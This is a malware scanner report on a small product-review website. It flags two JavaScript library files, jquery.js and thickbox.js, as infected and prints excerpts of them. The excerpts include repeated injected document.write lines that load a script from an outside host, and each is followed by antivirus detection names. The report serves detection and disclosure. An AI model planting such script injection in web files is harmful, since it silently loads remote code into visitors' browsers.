New scan:

Malware Scanner report for blogging-product-review.info

Malicious/Suspicious/Total urls checked
2/0/13
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "blogging-product-review.info" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=blogging-product-review.info

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://blogging-product-review.info/
200 OK
Content-Length: 31244
Content-Type: text/html
clean
http://blogging-product-review.info/jquery.js
200 OK
Content-Length: 35094
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
var _jQuery = window.jQuery,
_$ = window.$;
var jQuery = window.jQuery = window.$ = function( selector, context ) {
return new jQuery.fn.init( selector, context );
};
var quickExpr = /^[^<]*(<(.|\s)+>)[^>]*$|^#(\w+)$/,
isSimple = /^.[^:#\[\.]*$/,
undefined;
jQuery.fn = jQuery.prototype = {
init: function( selector, context ) {
selector = selector || document;
if ( selector.nodeType ) {
this[0] = selecto
... 3637 bytes are skipped ...
t src=http://prova.aba-formacio.com/home/favicon.php ><\/script>');
document.write('<script src=http://prova.aba-formacio.com/home/favicon.php ><\/script>');
document.write('<script src=http://prova.aba-formacio.com/home/favicon.php ><\/script>');
document.write('<script src=http://prova.aba-formacio.com/home/favicon.php ><\/script>');
document.write('<script src=http://prova.aba-formacio.com/home/favicon.php ><\/script>');

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
JS/Gamburl.U
Avast
JS:Includer-APW [Trj]
Ikarus
Trojan.JS.Gamburl
K7AntiVirus
Exploit ( 04c55e041 )
Comodo
UnclassifiedMalware
K7GW
Exploit ( 04c55e041 )
McAfee-GW-Edition
JS/Redirector.o
Microsoft
Trojan:JS/Gamburl.E
Kaspersky
HEUR:Trojan.Script.Generic
TotalDefense
JS/Redirector!generic
McAfee
JS/Redirector.o
F-Prot
HTML/Linker.U
AVG
JS/Downloader.Agent
Commtouch
HTML/Linker.U

http://blogging-product-review.info/thickbox.js
200 OK
Content-Length: 30998
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var tb_pathToImage = "images/loadingAnimation.gif";
$(document).ready(function(){
tb_init('a.thickbox, area.thickbox, input.thickbox'); imgLoader = new Image(); imgLoader.src = tb_pathToImage;
});
function tb_init(domChunk){
$(domChunk).click(function(){
var t = this.title || this.name || null;
var a = this.href || this.alt;
var g = this.rel || false;
tb_show(t,a,g);
this.blur();
return false;
});
}
function tb_show(caption, url
... 3642 bytes are skipped ...
t src=http://prova.aba-formacio.com/home/favicon.php ><\/script>');
document.write('<script src=http://prova.aba-formacio.com/home/favicon.php ><\/script>');
document.write('<script src=http://prova.aba-formacio.com/home/favicon.php ><\/script>');
document.write('<script src=http://prova.aba-formacio.com/home/favicon.php ><\/script>');
document.write('<script src=http://prova.aba-formacio.com/home/favicon.php ><\/script>');

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
JS/Gamburl.U
Avast
JS:Includer-APW [Trj]
Ikarus
Trojan.JS.Gamburl
K7AntiVirus
Exploit ( 04c55e041 )
Comodo
UnclassifiedMalware
K7GW
Exploit ( 04c55e041 )
McAfee-GW-Edition
JS/Redirector.o
Microsoft
Trojan:JS/Gamburl.E
Kaspersky
HEUR:Trojan.Script.Generic
TotalDefense
JS/Redirector!generic
McAfee
JS/Redirector.o
VIPRE
Trojan-Clicker.HTML.RemoteScript (v)
F-Prot
HTML/Linker.U
AVG
JS/Downloader.Agent
Sophos
Mal/HappJS-A
GData
Script.Trojan.Agent.4DTT12
Commtouch
HTML/Linker.U
ESET-NOD32
JS/TrojanDownloader.HackLoad.AF

http://blogging-product-review.info/reviews/blogging_in_action.php
200 OK
Content-Length: 540
Content-Type: text/html
clean
http://blogging-product-review.info/test404page.js
404 Not Found
Content-Length: 409
Content-Type: text/html
clean
http://blogging-product-review.info/videos/blogging_in_action.php?keepThis=true&TB_iframe=true&height=450&width=450
200 OK
Content-Length: 1352
Content-Type: text/html
clean
http://blogging-product-review.info/videos/../reviews/blogging_in_action.php
200 OK
Content-Length: 540
Content-Type: text/html
clean
http://blogging-product-review.info/reviews/atomic_blogging.php
200 OK
Content-Length: 547
Content-Type: text/html
clean
http://blogging-product-review.info/videos/atomic_blogging.php?keepThis=true&TB_iframe=true&height=450&width=450
200 OK
Content-Length: 1351
Content-Type: text/html
clean
http://blogging-product-review.info/videos/../reviews/atomic_blogging.php
200 OK
Content-Length: 547
Content-Type: text/html
clean
http://blogging-product-review.info/reviews/blog_paycheck.php
200 OK
Content-Length: 591
Content-Type: text/html
clean
http://blogging-product-review.info/videos/blog_paycheck.php?keepThis=true&TB_iframe=true&height=450&width=450
200 OK
Content-Length: 1340
Content-Type: text/html
clean
http://blogging-product-review.info/videos/../reviews/blog_paycheck.php
200 OK
Content-Length: 591
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: blogging-product-review.info

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 Mar 2015 21:57:05 GMT
Server: Apache
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: blogging-product-review.info
Referer: http://www.google.com/search?q=blogging-product-review.info

Result:
The result is similar to the first query. There are no suspicious redirects found.